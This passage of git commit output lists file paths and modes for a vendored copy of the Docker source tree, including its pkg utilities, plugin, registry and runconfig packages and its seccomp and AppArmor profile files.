vendor/github.com/docker/docker/pkg/chrootarchive/init_unix.go create mode 100644 vendor/github.com/docker/docker/pkg/chrootarchive/init_windows.go create mode 100644 vendor/github.com/docker/docker/pkg/devicemapper/devmapper.go create mode 100644 vendor/github.com/docker/docker/pkg/devicemapper/devmapper_log.go create mode 100644 vendor/github.com/docker/docker/pkg/devicemapper/devmapper_wrapper.go create mode 100644 vendor/github.com/docker/docker/pkg/devicemapper/devmapper_wrapper_deferred_remove.go create mode 
100644 vendor/github.com/docker/docker/pkg/devicemapper/devmapper_wrapper_no_deferred_remove.go create mode 100644 vendor/github.com/docker/docker/pkg/devicemapper/ioctl.go create mode 100644 vendor/github.com/docker/docker/pkg/devicemapper/log.go create mode 100644 vendor/github.com/docker/docker/pkg/directory/directory.go create mode 100644 vendor/github.com/docker/docker/pkg/directory/directory_test.go create mode 100644 vendor/github.com/docker/docker/pkg/directory/directory_unix.go create mode 100644 vendor/github.com/docker/docker/pkg/directory/directory_windows.go create mode 100644 vendor/github.com/docker/docker/pkg/discovery/README.md create mode 100644 vendor/github.com/docker/docker/pkg/discovery/backends.go create mode 100644 vendor/github.com/docker/docker/pkg/discovery/discovery.go create mode 100644 vendor/github.com/docker/docker/pkg/discovery/discovery_test.go create mode 100644 vendor/github.com/docker/docker/pkg/discovery/entry.go create mode 100644 vendor/github.com/docker/docker/pkg/discovery/file/file.go create mode 100644 vendor/github.com/docker/docker/pkg/discovery/file/file_test.go create mode 100644 vendor/github.com/docker/docker/pkg/discovery/generator.go create mode 100644 vendor/github.com/docker/docker/pkg/discovery/generator_test.go create mode 100644 vendor/github.com/docker/docker/pkg/discovery/kv/kv.go create mode 100644 vendor/github.com/docker/docker/pkg/discovery/kv/kv_test.go create mode 100644 vendor/github.com/docker/docker/pkg/discovery/memory/memory.go create mode 100644 vendor/github.com/docker/docker/pkg/discovery/memory/memory_test.go create mode 100644 vendor/github.com/docker/docker/pkg/discovery/nodes/nodes.go create mode 100644 vendor/github.com/docker/docker/pkg/discovery/nodes/nodes_test.go create mode 100644 vendor/github.com/docker/docker/pkg/filenotify/filenotify.go create mode 100644 vendor/github.com/docker/docker/pkg/filenotify/fsnotify.go create mode 100644 
vendor/github.com/docker/docker/pkg/filenotify/poller.go create mode 100644 vendor/github.com/docker/docker/pkg/filenotify/poller_test.go create mode 100644 vendor/github.com/docker/docker/pkg/fileutils/fileutils.go create mode 100644 vendor/github.com/docker/docker/pkg/fileutils/fileutils_darwin.go create mode 100644 vendor/github.com/docker/docker/pkg/fileutils/fileutils_solaris.go create mode 100644 vendor/github.com/docker/docker/pkg/fileutils/fileutils_test.go create mode 100644 vendor/github.com/docker/docker/pkg/fileutils/fileutils_unix.go create mode 100644 vendor/github.com/docker/docker/pkg/fileutils/fileutils_windows.go create mode 100644 vendor/github.com/docker/docker/pkg/fsutils/fsutils_linux.go create mode 100644 vendor/github.com/docker/docker/pkg/fsutils/fsutils_linux_test.go create mode 100644 vendor/github.com/docker/docker/pkg/gitutils/gitutils.go create mode 100644 vendor/github.com/docker/docker/pkg/gitutils/gitutils_test.go create mode 100644 vendor/github.com/docker/docker/pkg/graphdb/conn_sqlite3_linux.go create mode 100644 vendor/github.com/docker/docker/pkg/graphdb/graphdb_linux.go create mode 100644 vendor/github.com/docker/docker/pkg/graphdb/graphdb_linux_test.go create mode 100644 vendor/github.com/docker/docker/pkg/graphdb/sort_linux.go create mode 100644 vendor/github.com/docker/docker/pkg/graphdb/sort_linux_test.go create mode 100644 vendor/github.com/docker/docker/pkg/graphdb/unsupported.go create mode 100644 vendor/github.com/docker/docker/pkg/graphdb/utils_linux.go create mode 100644 vendor/github.com/docker/docker/pkg/homedir/homedir.go create mode 100644 vendor/github.com/docker/docker/pkg/homedir/homedir_test.go create mode 100644 vendor/github.com/docker/docker/pkg/httputils/httputils.go create mode 100644 vendor/github.com/docker/docker/pkg/httputils/httputils_test.go create mode 100644 vendor/github.com/docker/docker/pkg/httputils/mimetype.go create mode 100644 vendor/github.com/docker/docker/pkg/httputils/mimetype_test.go 
create mode 100644 vendor/github.com/docker/docker/pkg/httputils/resumablerequestreader.go create mode 100644 vendor/github.com/docker/docker/pkg/httputils/resumablerequestreader_test.go create mode 100644 vendor/github.com/docker/docker/pkg/idtools/idtools.go create mode 100644 vendor/github.com/docker/docker/pkg/idtools/idtools_unix.go create mode 100644 vendor/github.com/docker/docker/pkg/idtools/idtools_unix_test.go create mode 100644 vendor/github.com/docker/docker/pkg/idtools/idtools_windows.go create mode 100644 vendor/github.com/docker/docker/pkg/idtools/usergroupadd_linux.go create mode 100644 vendor/github.com/docker/docker/pkg/idtools/usergroupadd_unsupported.go create mode 100644 vendor/github.com/docker/docker/pkg/idtools/utils_unix.go create mode 100644 vendor/github.com/docker/docker/pkg/integration/checker/checker.go create mode 100644 vendor/github.com/docker/docker/pkg/integration/cmd/command.go create mode 100644 vendor/github.com/docker/docker/pkg/integration/cmd/command_test.go create mode 100644 vendor/github.com/docker/docker/pkg/integration/utils.go create mode 100644 vendor/github.com/docker/docker/pkg/integration/utils_test.go create mode 100644 vendor/github.com/docker/docker/pkg/ioutils/buffer.go create mode 100644 vendor/github.com/docker/docker/pkg/ioutils/buffer_test.go create mode 100644 vendor/github.com/docker/docker/pkg/ioutils/bytespipe.go create mode 100644 vendor/github.com/docker/docker/pkg/ioutils/bytespipe_test.go create mode 100644 vendor/github.com/docker/docker/pkg/ioutils/fmt.go create mode 100644 vendor/github.com/docker/docker/pkg/ioutils/fmt_test.go create mode 100644 vendor/github.com/docker/docker/pkg/ioutils/fswriters.go create mode 100644 vendor/github.com/docker/docker/pkg/ioutils/fswriters_test.go create mode 100644 vendor/github.com/docker/docker/pkg/ioutils/multireader.go create mode 100644 vendor/github.com/docker/docker/pkg/ioutils/multireader_test.go create mode 100644 
vendor/github.com/docker/docker/pkg/ioutils/readers.go create mode 100644 vendor/github.com/docker/docker/pkg/ioutils/readers_test.go create mode 100644 vendor/github.com/docker/docker/pkg/ioutils/temp_unix.go create mode 100644 vendor/github.com/docker/docker/pkg/ioutils/temp_windows.go create mode 100644 vendor/github.com/docker/docker/pkg/ioutils/writeflusher.go create mode 100644 vendor/github.com/docker/docker/pkg/ioutils/writers.go create mode 100644 vendor/github.com/docker/docker/pkg/ioutils/writers_test.go create mode 100644 vendor/github.com/docker/docker/pkg/jsonlog/jsonlog.go create mode 100644 vendor/github.com/docker/docker/pkg/jsonlog/jsonlog_marshalling.go create mode 100644 vendor/github.com/docker/docker/pkg/jsonlog/jsonlog_marshalling_test.go create mode 100644 vendor/github.com/docker/docker/pkg/jsonlog/jsonlogbytes.go create mode 100644 vendor/github.com/docker/docker/pkg/jsonlog/jsonlogbytes_test.go create mode 100644 vendor/github.com/docker/docker/pkg/jsonlog/time_marshalling.go create mode 100644 vendor/github.com/docker/docker/pkg/jsonlog/time_marshalling_test.go create mode 100644 vendor/github.com/docker/docker/pkg/jsonmessage/jsonmessage.go create mode 100644 vendor/github.com/docker/docker/pkg/jsonmessage/jsonmessage_test.go create mode 100644 vendor/github.com/docker/docker/pkg/listeners/listeners_solaris.go create mode 100644 vendor/github.com/docker/docker/pkg/listeners/listeners_unix.go create mode 100644 vendor/github.com/docker/docker/pkg/listeners/listeners_windows.go create mode 100644 vendor/github.com/docker/docker/pkg/locker/README.md create mode 100644 vendor/github.com/docker/docker/pkg/locker/locker.go create mode 100644 vendor/github.com/docker/docker/pkg/locker/locker_test.go create mode 100644 vendor/github.com/docker/docker/pkg/longpath/longpath.go create mode 100644 vendor/github.com/docker/docker/pkg/longpath/longpath_test.go create mode 100644 vendor/github.com/docker/docker/pkg/loopback/attach_loopback.go create 
mode 100644 vendor/github.com/docker/docker/pkg/loopback/ioctl.go create mode 100644 vendor/github.com/docker/docker/pkg/loopback/loop_wrapper.go create mode 100644 vendor/github.com/docker/docker/pkg/loopback/loopback.go create mode 100644 vendor/github.com/docker/docker/pkg/mount/flags.go create mode 100644 vendor/github.com/docker/docker/pkg/mount/flags_freebsd.go create mode 100644 vendor/github.com/docker/docker/pkg/mount/flags_linux.go create mode 100644 vendor/github.com/docker/docker/pkg/mount/flags_unsupported.go create mode 100644 vendor/github.com/docker/docker/pkg/mount/mount.go create mode 100644 vendor/github.com/docker/docker/pkg/mount/mount_unix_test.go create mode 100644 vendor/github.com/docker/docker/pkg/mount/mounter_freebsd.go create mode 100644 vendor/github.com/docker/docker/pkg/mount/mounter_linux.go create mode 100644 vendor/github.com/docker/docker/pkg/mount/mounter_solaris.go create mode 100644 vendor/github.com/docker/docker/pkg/mount/mounter_unsupported.go create mode 100644 vendor/github.com/docker/docker/pkg/mount/mountinfo.go create mode 100644 vendor/github.com/docker/docker/pkg/mount/mountinfo_freebsd.go create mode 100644 vendor/github.com/docker/docker/pkg/mount/mountinfo_linux.go create mode 100644 vendor/github.com/docker/docker/pkg/mount/mountinfo_linux_test.go create mode 100644 vendor/github.com/docker/docker/pkg/mount/mountinfo_solaris.go create mode 100644 vendor/github.com/docker/docker/pkg/mount/mountinfo_unsupported.go create mode 100644 vendor/github.com/docker/docker/pkg/mount/mountinfo_windows.go create mode 100644 vendor/github.com/docker/docker/pkg/mount/sharedsubtree_linux.go create mode 100644 vendor/github.com/docker/docker/pkg/mount/sharedsubtree_linux_test.go create mode 100644 vendor/github.com/docker/docker/pkg/mount/sharedsubtree_solaris.go create mode 100644 vendor/github.com/docker/docker/pkg/namesgenerator/cmd/names-generator/main.go create mode 100644 
vendor/github.com/docker/docker/pkg/namesgenerator/names-generator.go create mode 100644 vendor/github.com/docker/docker/pkg/namesgenerator/names-generator_test.go create mode 100644 vendor/github.com/docker/docker/pkg/parsers/kernel/kernel.go create mode 100644 vendor/github.com/docker/docker/pkg/parsers/kernel/kernel_darwin.go create mode 100644 vendor/github.com/docker/docker/pkg/parsers/kernel/kernel_unix.go create mode 100644 vendor/github.com/docker/docker/pkg/parsers/kernel/kernel_unix_test.go create mode 100644 vendor/github.com/docker/docker/pkg/parsers/kernel/kernel_windows.go create mode 100644 vendor/github.com/docker/docker/pkg/parsers/kernel/uname_linux.go create mode 100644 vendor/github.com/docker/docker/pkg/parsers/kernel/uname_solaris.go create mode 100644 vendor/github.com/docker/docker/pkg/parsers/kernel/uname_unsupported.go create mode 100644 vendor/github.com/docker/docker/pkg/parsers/operatingsystem/operatingsystem_linux.go create mode 100644 vendor/github.com/docker/docker/pkg/parsers/operatingsystem/operatingsystem_solaris.go create mode 100644 vendor/github.com/docker/docker/pkg/parsers/operatingsystem/operatingsystem_unix.go create mode 100644 vendor/github.com/docker/docker/pkg/parsers/operatingsystem/operatingsystem_unix_test.go create mode 100644 vendor/github.com/docker/docker/pkg/parsers/operatingsystem/operatingsystem_windows.go create mode 100644 vendor/github.com/docker/docker/pkg/parsers/parsers.go create mode 100644 vendor/github.com/docker/docker/pkg/parsers/parsers_test.go create mode 100644 vendor/github.com/docker/docker/pkg/pidfile/pidfile.go create mode 100644 vendor/github.com/docker/docker/pkg/pidfile/pidfile_darwin.go create mode 100644 vendor/github.com/docker/docker/pkg/pidfile/pidfile_test.go create mode 100644 vendor/github.com/docker/docker/pkg/pidfile/pidfile_unix.go create mode 100644 vendor/github.com/docker/docker/pkg/pidfile/pidfile_windows.go create mode 100644 
vendor/github.com/docker/docker/pkg/platform/architecture_linux.go create mode 100644 vendor/github.com/docker/docker/pkg/platform/architecture_unix.go create mode 100644 vendor/github.com/docker/docker/pkg/platform/architecture_windows.go create mode 100644 vendor/github.com/docker/docker/pkg/platform/platform.go create mode 100644 vendor/github.com/docker/docker/pkg/platform/utsname_int8.go create mode 100644 vendor/github.com/docker/docker/pkg/platform/utsname_uint8.go create mode 100644 vendor/github.com/docker/docker/pkg/plugingetter/getter.go create mode 100644 vendor/github.com/docker/docker/pkg/plugins/client.go create mode 100644 vendor/github.com/docker/docker/pkg/plugins/client_test.go create mode 100644 vendor/github.com/docker/docker/pkg/plugins/discovery.go create mode 100644 vendor/github.com/docker/docker/pkg/plugins/discovery_test.go create mode 100644 vendor/github.com/docker/docker/pkg/plugins/discovery_unix.go create mode 100644 vendor/github.com/docker/docker/pkg/plugins/discovery_unix_test.go create mode 100644 vendor/github.com/docker/docker/pkg/plugins/discovery_windows.go create mode 100644 vendor/github.com/docker/docker/pkg/plugins/errors.go create mode 100644 vendor/github.com/docker/docker/pkg/plugins/plugin_test.go create mode 100644 vendor/github.com/docker/docker/pkg/plugins/pluginrpc-gen/README.md create mode 100644 vendor/github.com/docker/docker/pkg/plugins/pluginrpc-gen/fixtures/foo.go create mode 100644 vendor/github.com/docker/docker/pkg/plugins/pluginrpc-gen/fixtures/otherfixture/spaceship.go create mode 100644 vendor/github.com/docker/docker/pkg/plugins/pluginrpc-gen/main.go create mode 100644 vendor/github.com/docker/docker/pkg/plugins/pluginrpc-gen/parser.go create mode 100644 vendor/github.com/docker/docker/pkg/plugins/pluginrpc-gen/parser_test.go create mode 100644 vendor/github.com/docker/docker/pkg/plugins/pluginrpc-gen/template.go create mode 100644 vendor/github.com/docker/docker/pkg/plugins/plugins.go create mode 
100644 vendor/github.com/docker/docker/pkg/plugins/plugins_linux.go create mode 100644 vendor/github.com/docker/docker/pkg/plugins/plugins_windows.go create mode 100644 vendor/github.com/docker/docker/pkg/plugins/transport/http.go create mode 100644 vendor/github.com/docker/docker/pkg/plugins/transport/transport.go create mode 100644 vendor/github.com/docker/docker/pkg/pools/pools.go create mode 100644 vendor/github.com/docker/docker/pkg/pools/pools_test.go create mode 100644 vendor/github.com/docker/docker/pkg/progress/progress.go create mode 100644 vendor/github.com/docker/docker/pkg/progress/progressreader.go create mode 100644 vendor/github.com/docker/docker/pkg/progress/progressreader_test.go create mode 100644 vendor/github.com/docker/docker/pkg/promise/promise.go create mode 100644 vendor/github.com/docker/docker/pkg/pubsub/publisher.go create mode 100644 vendor/github.com/docker/docker/pkg/pubsub/publisher_test.go create mode 100644 vendor/github.com/docker/docker/pkg/random/random.go create mode 100644 vendor/github.com/docker/docker/pkg/random/random_test.go create mode 100644 vendor/github.com/docker/docker/pkg/reexec/README.md create mode 100644 vendor/github.com/docker/docker/pkg/reexec/command_linux.go create mode 100644 vendor/github.com/docker/docker/pkg/reexec/command_unix.go create mode 100644 vendor/github.com/docker/docker/pkg/reexec/command_unsupported.go create mode 100644 vendor/github.com/docker/docker/pkg/reexec/command_windows.go create mode 100644 vendor/github.com/docker/docker/pkg/reexec/reexec.go create mode 100644 vendor/github.com/docker/docker/pkg/registrar/registrar.go create mode 100644 vendor/github.com/docker/docker/pkg/registrar/registrar_test.go create mode 100644 vendor/github.com/docker/docker/pkg/signal/README.md create mode 100644 vendor/github.com/docker/docker/pkg/signal/signal.go create mode 100644 vendor/github.com/docker/docker/pkg/signal/signal_darwin.go create mode 100644 
vendor/github.com/docker/docker/pkg/signal/signal_freebsd.go create mode 100644 vendor/github.com/docker/docker/pkg/signal/signal_linux.go create mode 100644 vendor/github.com/docker/docker/pkg/signal/signal_solaris.go create mode 100644 vendor/github.com/docker/docker/pkg/signal/signal_unix.go create mode 100644 vendor/github.com/docker/docker/pkg/signal/signal_unsupported.go create mode 100644 vendor/github.com/docker/docker/pkg/signal/signal_windows.go create mode 100644 vendor/github.com/docker/docker/pkg/signal/trap.go create mode 100644 vendor/github.com/docker/docker/pkg/stdcopy/stdcopy.go create mode 100644 vendor/github.com/docker/docker/pkg/stdcopy/stdcopy_test.go create mode 100644 vendor/github.com/docker/docker/pkg/streamformatter/streamformatter.go create mode 100644 vendor/github.com/docker/docker/pkg/streamformatter/streamformatter_test.go create mode 100644 vendor/github.com/docker/docker/pkg/stringid/README.md create mode 100644 vendor/github.com/docker/docker/pkg/stringid/stringid.go create mode 100644 vendor/github.com/docker/docker/pkg/stringid/stringid_test.go create mode 100644 vendor/github.com/docker/docker/pkg/stringutils/README.md create mode 100644 vendor/github.com/docker/docker/pkg/stringutils/stringutils.go create mode 100644 vendor/github.com/docker/docker/pkg/stringutils/stringutils_test.go create mode 100644 vendor/github.com/docker/docker/pkg/symlink/LICENSE.APACHE create mode 100644 vendor/github.com/docker/docker/pkg/symlink/LICENSE.BSD create mode 100644 vendor/github.com/docker/docker/pkg/symlink/README.md create mode 100644 vendor/github.com/docker/docker/pkg/symlink/fs.go create mode 100644 vendor/github.com/docker/docker/pkg/symlink/fs_unix.go create mode 100644 vendor/github.com/docker/docker/pkg/symlink/fs_unix_test.go create mode 100644 vendor/github.com/docker/docker/pkg/symlink/fs_windows.go create mode 100644 vendor/github.com/docker/docker/pkg/sysinfo/README.md create mode 100644 
vendor/github.com/docker/docker/pkg/sysinfo/numcpu.go create mode 100644 vendor/github.com/docker/docker/pkg/sysinfo/numcpu_linux.go create mode 100644 vendor/github.com/docker/docker/pkg/sysinfo/numcpu_windows.go create mode 100644 vendor/github.com/docker/docker/pkg/sysinfo/sysinfo.go create mode 100644 vendor/github.com/docker/docker/pkg/sysinfo/sysinfo_linux.go create mode 100644 vendor/github.com/docker/docker/pkg/sysinfo/sysinfo_linux_test.go create mode 100644 vendor/github.com/docker/docker/pkg/sysinfo/sysinfo_solaris.go create mode 100644 vendor/github.com/docker/docker/pkg/sysinfo/sysinfo_test.go create mode 100644 vendor/github.com/docker/docker/pkg/sysinfo/sysinfo_unix.go create mode 100644 vendor/github.com/docker/docker/pkg/sysinfo/sysinfo_windows.go create mode 100644 vendor/github.com/docker/docker/pkg/system/chtimes.go create mode 100644 vendor/github.com/docker/docker/pkg/system/chtimes_test.go create mode 100644 vendor/github.com/docker/docker/pkg/system/chtimes_unix.go create mode 100644 vendor/github.com/docker/docker/pkg/system/chtimes_unix_test.go create mode 100644 vendor/github.com/docker/docker/pkg/system/chtimes_windows.go create mode 100644 vendor/github.com/docker/docker/pkg/system/chtimes_windows_test.go create mode 100644 vendor/github.com/docker/docker/pkg/system/errors.go create mode 100644 vendor/github.com/docker/docker/pkg/system/events_windows.go create mode 100644 vendor/github.com/docker/docker/pkg/system/exitcode.go create mode 100644 vendor/github.com/docker/docker/pkg/system/filesys.go create mode 100644 vendor/github.com/docker/docker/pkg/system/filesys_windows.go create mode 100644 vendor/github.com/docker/docker/pkg/system/lstat.go create mode 100644 vendor/github.com/docker/docker/pkg/system/lstat_unix_test.go create mode 100644 vendor/github.com/docker/docker/pkg/system/lstat_windows.go create mode 100644 vendor/github.com/docker/docker/pkg/system/meminfo.go create mode 100644 
vendor/github.com/docker/docker/pkg/system/meminfo_linux.go create mode 100644 vendor/github.com/docker/docker/pkg/system/meminfo_solaris.go create mode 100644 vendor/github.com/docker/docker/pkg/system/meminfo_unix_test.go create mode 100644 vendor/github.com/docker/docker/pkg/system/meminfo_unsupported.go create mode 100644 vendor/github.com/docker/docker/pkg/system/meminfo_windows.go create mode 100644 vendor/github.com/docker/docker/pkg/system/mknod.go create mode 100644 vendor/github.com/docker/docker/pkg/system/mknod_windows.go create mode 100644 vendor/github.com/docker/docker/pkg/system/path_unix.go create mode 100644 vendor/github.com/docker/docker/pkg/system/path_windows.go create mode 100644 vendor/github.com/docker/docker/pkg/system/path_windows_test.go create mode 100644 vendor/github.com/docker/docker/pkg/system/stat.go create mode 100644 vendor/github.com/docker/docker/pkg/system/stat_darwin.go create mode 100644 vendor/github.com/docker/docker/pkg/system/stat_freebsd.go create mode 100644 vendor/github.com/docker/docker/pkg/system/stat_linux.go create mode 100644 vendor/github.com/docker/docker/pkg/system/stat_openbsd.go create mode 100644 vendor/github.com/docker/docker/pkg/system/stat_solaris.go create mode 100644 vendor/github.com/docker/docker/pkg/system/stat_unix_test.go create mode 100644 vendor/github.com/docker/docker/pkg/system/stat_unsupported.go create mode 100644 vendor/github.com/docker/docker/pkg/system/stat_windows.go create mode 100644 vendor/github.com/docker/docker/pkg/system/syscall_unix.go create mode 100644 vendor/github.com/docker/docker/pkg/system/syscall_windows.go create mode 100644 vendor/github.com/docker/docker/pkg/system/syscall_windows_test.go create mode 100644 vendor/github.com/docker/docker/pkg/system/umask.go create mode 100644 vendor/github.com/docker/docker/pkg/system/umask_windows.go create mode 100644 vendor/github.com/docker/docker/pkg/system/utimes_freebsd.go create mode 100644 
vendor/github.com/docker/docker/pkg/system/utimes_linux.go create mode 100644 vendor/github.com/docker/docker/pkg/system/utimes_unix_test.go create mode 100644 vendor/github.com/docker/docker/pkg/system/utimes_unsupported.go create mode 100644 vendor/github.com/docker/docker/pkg/system/xattrs_linux.go create mode 100644 vendor/github.com/docker/docker/pkg/system/xattrs_unsupported.go create mode 100644 vendor/github.com/docker/docker/pkg/tailfile/tailfile.go create mode 100644 vendor/github.com/docker/docker/pkg/tailfile/tailfile_test.go create mode 100644 vendor/github.com/docker/docker/pkg/tarsum/builder_context.go create mode 100644 vendor/github.com/docker/docker/pkg/tarsum/builder_context_test.go create mode 100644 vendor/github.com/docker/docker/pkg/tarsum/fileinfosums.go create mode 100644 vendor/github.com/docker/docker/pkg/tarsum/fileinfosums_test.go create mode 100644 vendor/github.com/docker/docker/pkg/tarsum/tarsum.go create mode 100644 vendor/github.com/docker/docker/pkg/tarsum/tarsum_spec.md create mode 100644 vendor/github.com/docker/docker/pkg/tarsum/tarsum_test.go create mode 100644 vendor/github.com/docker/docker/pkg/tarsum/testdata/46af0962ab5afeb5ce6740d4d91652e69206fc991fd5328c1a94d364ad00e457/json create mode 100644 vendor/github.com/docker/docker/pkg/tarsum/testdata/46af0962ab5afeb5ce6740d4d91652e69206fc991fd5328c1a94d364ad00e457/layer.tar create mode 100644 vendor/github.com/docker/docker/pkg/tarsum/testdata/511136ea3c5a64f264b78b5433614aec563103b4d4702f3ba7d4d2698e22c158/json create mode 100644 vendor/github.com/docker/docker/pkg/tarsum/testdata/511136ea3c5a64f264b78b5433614aec563103b4d4702f3ba7d4d2698e22c158/layer.tar create mode 100644 vendor/github.com/docker/docker/pkg/tarsum/testdata/collision/collision-0.tar create mode 100644 vendor/github.com/docker/docker/pkg/tarsum/testdata/collision/collision-1.tar create mode 100644 vendor/github.com/docker/docker/pkg/tarsum/testdata/collision/collision-2.tar create mode 100644 
vendor/github.com/docker/docker/pkg/tarsum/testdata/collision/collision-3.tar create mode 100644 vendor/github.com/docker/docker/pkg/tarsum/testdata/xattr/json create mode 100644 vendor/github.com/docker/docker/pkg/tarsum/testdata/xattr/layer.tar create mode 100644 vendor/github.com/docker/docker/pkg/tarsum/versioning.go create mode 100644 vendor/github.com/docker/docker/pkg/tarsum/versioning_test.go create mode 100644 vendor/github.com/docker/docker/pkg/tarsum/writercloser.go create mode 100644 vendor/github.com/docker/docker/pkg/term/ascii.go create mode 100644 vendor/github.com/docker/docker/pkg/term/ascii_test.go create mode 100644 vendor/github.com/docker/docker/pkg/term/tc_linux_cgo.go create mode 100644 vendor/github.com/docker/docker/pkg/term/tc_other.go create mode 100644 vendor/github.com/docker/docker/pkg/term/tc_solaris_cgo.go create mode 100644 vendor/github.com/docker/docker/pkg/term/term.go create mode 100644 vendor/github.com/docker/docker/pkg/term/term_solaris.go create mode 100644 vendor/github.com/docker/docker/pkg/term/term_unix.go create mode 100644 vendor/github.com/docker/docker/pkg/term/term_windows.go create mode 100644 vendor/github.com/docker/docker/pkg/term/termios_darwin.go create mode 100644 vendor/github.com/docker/docker/pkg/term/termios_freebsd.go create mode 100644 vendor/github.com/docker/docker/pkg/term/termios_linux.go create mode 100644 vendor/github.com/docker/docker/pkg/term/termios_openbsd.go create mode 100644 vendor/github.com/docker/docker/pkg/term/windows/ansi_reader.go create mode 100644 vendor/github.com/docker/docker/pkg/term/windows/ansi_writer.go create mode 100644 vendor/github.com/docker/docker/pkg/term/windows/console.go create mode 100644 vendor/github.com/docker/docker/pkg/term/windows/windows.go create mode 100644 vendor/github.com/docker/docker/pkg/term/windows/windows_test.go create mode 100644 vendor/github.com/docker/docker/pkg/testutil/assert/assert.go create mode 100644 
vendor/github.com/docker/docker/pkg/testutil/pkg.go create mode 100644 vendor/github.com/docker/docker/pkg/testutil/tempfile/tempfile.go create mode 100644 vendor/github.com/docker/docker/pkg/tlsconfig/tlsconfig_clone.go create mode 100644 vendor/github.com/docker/docker/pkg/tlsconfig/tlsconfig_clone_go16.go create mode 100644 vendor/github.com/docker/docker/pkg/tlsconfig/tlsconfig_clone_go17.go create mode 100644 vendor/github.com/docker/docker/pkg/truncindex/truncindex.go create mode 100644 vendor/github.com/docker/docker/pkg/truncindex/truncindex_test.go create mode 100644 vendor/github.com/docker/docker/pkg/urlutil/urlutil.go create mode 100644 vendor/github.com/docker/docker/pkg/urlutil/urlutil_test.go create mode 100644 vendor/github.com/docker/docker/pkg/useragent/README.md create mode 100644 vendor/github.com/docker/docker/pkg/useragent/useragent.go create mode 100644 vendor/github.com/docker/docker/pkg/useragent/useragent_test.go create mode 100644 vendor/github.com/docker/docker/plugin/backend_linux.go create mode 100644 vendor/github.com/docker/docker/plugin/backend_unsupported.go create mode 100644 vendor/github.com/docker/docker/plugin/blobstore.go create mode 100644 vendor/github.com/docker/docker/plugin/defs.go create mode 100644 vendor/github.com/docker/docker/plugin/manager.go create mode 100644 vendor/github.com/docker/docker/plugin/manager_linux.go create mode 100644 vendor/github.com/docker/docker/plugin/manager_solaris.go create mode 100644 vendor/github.com/docker/docker/plugin/manager_windows.go create mode 100644 vendor/github.com/docker/docker/plugin/store.go create mode 100644 vendor/github.com/docker/docker/plugin/store_test.go create mode 100644 vendor/github.com/docker/docker/plugin/v2/plugin.go create mode 100644 vendor/github.com/docker/docker/plugin/v2/plugin_linux.go create mode 100644 vendor/github.com/docker/docker/plugin/v2/plugin_unsupported.go create mode 100644 vendor/github.com/docker/docker/plugin/v2/settable.go create mode 
100644 vendor/github.com/docker/docker/plugin/v2/settable_test.go create mode 100644 vendor/github.com/docker/docker/poule.yml create mode 100644 vendor/github.com/docker/docker/profiles/apparmor/apparmor.go create mode 100644 vendor/github.com/docker/docker/profiles/apparmor/template.go create mode 100755 vendor/github.com/docker/docker/profiles/seccomp/default.json create mode 100755 vendor/github.com/docker/docker/profiles/seccomp/fixtures/example.json create mode 100644 vendor/github.com/docker/docker/profiles/seccomp/generate.go create mode 100644 vendor/github.com/docker/docker/profiles/seccomp/seccomp.go create mode 100644 vendor/github.com/docker/docker/profiles/seccomp/seccomp_default.go create mode 100644 vendor/github.com/docker/docker/profiles/seccomp/seccomp_test.go create mode 100644 vendor/github.com/docker/docker/profiles/seccomp/seccomp_unsupported.go create mode 100644 vendor/github.com/docker/docker/project/ARM.md create mode 100644 vendor/github.com/docker/docker/project/BRANCHES-AND-TAGS.md create mode 120000 vendor/github.com/docker/docker/project/CONTRIBUTORS.md create mode 100644 vendor/github.com/docker/docker/project/GOVERNANCE.md create mode 100644 vendor/github.com/docker/docker/project/IRC-ADMINISTRATION.md create mode 100644 vendor/github.com/docker/docker/project/ISSUE-TRIAGE.md create mode 100644 vendor/github.com/docker/docker/project/PACKAGE-REPO-MAINTENANCE.md create mode 100644 vendor/github.com/docker/docker/project/PACKAGERS.md create mode 100644 vendor/github.com/docker/docker/project/PATCH-RELEASES.md create mode 100644 vendor/github.com/docker/docker/project/PRINCIPLES.md create mode 100644 vendor/github.com/docker/docker/project/README.md create mode 100644 vendor/github.com/docker/docker/project/RELEASE-CHECKLIST.md create mode 100644 vendor/github.com/docker/docker/project/RELEASE-PROCESS.md create mode 100644 vendor/github.com/docker/docker/project/REVIEWING.md create mode 100644 
vendor/github.com/docker/docker/project/TOOLS.md create mode 100644 vendor/github.com/docker/docker/reference/reference.go create mode 100644 vendor/github.com/docker/docker/reference/reference_test.go create mode 100644 vendor/github.com/docker/docker/reference/store.go create mode 100644 vendor/github.com/docker/docker/reference/store_test.go create mode 100644 vendor/github.com/docker/docker/registry/auth.go create mode 100644 vendor/github.com/docker/docker/registry/auth_test.go create mode 100644 vendor/github.com/docker/docker/registry/config.go create mode 100644 vendor/github.com/docker/docker/registry/config_test.go create mode 100644 vendor/github.com/docker/docker/registry/config_unix.go create mode 100644 vendor/github.com/docker/docker/registry/config_windows.go create mode 100644 vendor/github.com/docker/docker/registry/endpoint_test.go create mode 100644 vendor/github.com/docker/docker/registry/endpoint_v1.go create mode 100644 vendor/github.com/docker/docker/registry/registry.go create mode 100644 vendor/github.com/docker/docker/registry/registry_mock_test.go create mode 100644 vendor/github.com/docker/docker/registry/registry_test.go create mode 100644 vendor/github.com/docker/docker/registry/service.go create mode 100644 vendor/github.com/docker/docker/registry/service_v1.go create mode 100644 vendor/github.com/docker/docker/registry/service_v1_test.go create mode 100644 vendor/github.com/docker/docker/registry/service_v2.go create mode 100644 vendor/github.com/docker/docker/registry/session.go create mode 100644 vendor/github.com/docker/docker/registry/types.go create mode 100644 vendor/github.com/docker/docker/restartmanager/restartmanager.go create mode 100644 vendor/github.com/docker/docker/restartmanager/restartmanager_test.go create mode 100644 vendor/github.com/docker/docker/runconfig/compare.go create mode 100644 vendor/github.com/docker/docker/runconfig/compare_test.go create mode 100644 vendor/github.com/docker/docker/runconfig/config.go 
